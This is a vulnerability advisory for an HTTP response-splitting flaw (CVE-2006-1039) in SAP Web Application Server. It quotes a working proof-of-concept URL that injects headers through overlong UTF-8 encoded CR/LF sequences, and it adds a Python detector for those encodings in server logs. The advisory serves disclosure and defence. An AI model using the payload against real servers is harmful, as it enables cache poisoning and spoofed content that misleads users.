SAP Web Application Server URI Input Validation Vulnerability

Vulnerability ID: 1109224    Vulnerability type: Code injection
Published: 2005-11-09    Updated: 2006-05-17
CVE ID: CVE-2006-1039    CNNVD-ID: CNNVD-200603-101
Platform: Multiple    CVSS score: 6.4
|Vulnerability source
https://www.exploit-db.com/exploits/27887
https://www.securityfocus.com/bid/18006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-101
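|Vulnerability details
SAP Web Application Server (WebAS) kernel versions before 7.0 allow remote attackers to inject arbitrary bytes into the HTTP response and obtain sensitive information, or have other impact, via a ";%20" followed by encoded HTTP headers.
|Exploit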
source: http://www.securityfocus.com/bid/18006/info

SAP Web Application Server is prone to an input-validation vulnerability that results in HTTP response-splitting attacks. This issue is due to a failure in the application to properly sanitize user-supplied input.

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

http://sap-was/x.htm;%20HTTP%c0%af1.0%20200%20OK%c0%8d%c0%8aContent-Length:%2035%c0%8d%c0%8aContent-Type:text%c0%afhtml%c0%8d%c0%8a%c0%8d%c0%8a%3Chtml%3e%3cbody%3ehello%3c%c0%afbody%3e%3c%c0%afhtml%3e%c0%8d%c0%8a%c0%8d%c0%8a
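
The `%c0%8d`, `%c0%8a` and `%c0%af` sequences in the URL above are overlong two-byte UTF-8 encodings of CR, LF and `/`, which is how the injected header lines get past a filter that only looks for `%0d%0a`. The following check for request URIs is an added example, not code from the advisory or from SAP; the function names and the sample URIs are constructed for illustration.

```python
from urllib.parse import unquote_to_bytes

# Code points that end a header line (CR, LF) or a path segment ("/").
SENSITIVE = {0x0D: "CR", 0x0A: "LF", 0x2F: "/"}

# Constructed sample inputs (assumptions, modelled on the pattern in the advisory).
SAMPLE_OVERLONG = "/x.htm;%20HTTP%c0%af1.0%20200%20OK%c0%8d%c0%8aX-Test:%201"
SAMPLE_RAW = "/x.htm;%20a%0d%0aX-Test:%201"
SAMPLE_BENIGN = "/index.htm?q=caf%c3%a9"


def encoded_control_hits(uri):
    """Return (offset, name, form) for every raw CR/LF and every overlong-encoded
    CR, LF or "/" found in the percent-decoded request URI."""
    raw = unquote_to_bytes(uri)
    hits = []
    i = 0
    while i < len(raw):
        b = raw[i]
        # Lead bytes 0xC0 and 0xC1 can only begin an overlong two-byte form of
        # U+0000..U+007F; a strict UTF-8 decoder rejects them outright.
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            if cp in SENSITIVE:
                hits.append((i, SENSITIVE[cp], "overlong"))
            i += 2
            continue
        if b in (0x0D, 0x0A):
            hits.append((i, SENSITIVE[b], "raw"))
        i += 1
    return hits


def carries_line_break(uri):
    """True when the decoded URI contains CR or LF in raw or overlong form."""
    return any(name in ("CR", "LF") for _, name, _ in encoded_control_hits(uri))


if __name__ == "__main__":
    for sample in (SAMPLE_OVERLONG, SAMPLE_RAW, SAMPLE_BENIGN):
        print(carries_line_break(sample), encoded_control_hits(sample))
```

Run it over the request-URI field of web server or proxy access logs; a hit in the "overlong" form is worth alerting on by itself, since legitimate clients do not emit `0xC0`/`0xC1` lead bytes.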
|Affected products
SAP Web Application Server 7.0
SAP Web Application Server 6.40
SAP Web Application Server 6.20
SAP Web Application Server 6.10
|References

Source: XF
Name: sap-was-url-obtain-information(25003)
Link: http://xforce.iss.net/xforce/xfdb/25003
Source: BID
Name: 18006
Link: http://www.securityfocus.com/bid/18006
Source: BUGTRAQ
Name: 20060301SAPWebApplicationServerhttprequesturlparsingvulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/426449/100/0/threaded
Source: VUPEN
Name: ADV-2006-0810
Link: http://www.frsirt.com/english/advisories/2006/0810
Source: SECTRACK
Name: 1015702
Link: http://securitytracker.com/id?1015702
Source: SECUNIA
Name: 19085
Link: http://secunia.com/advisories/19085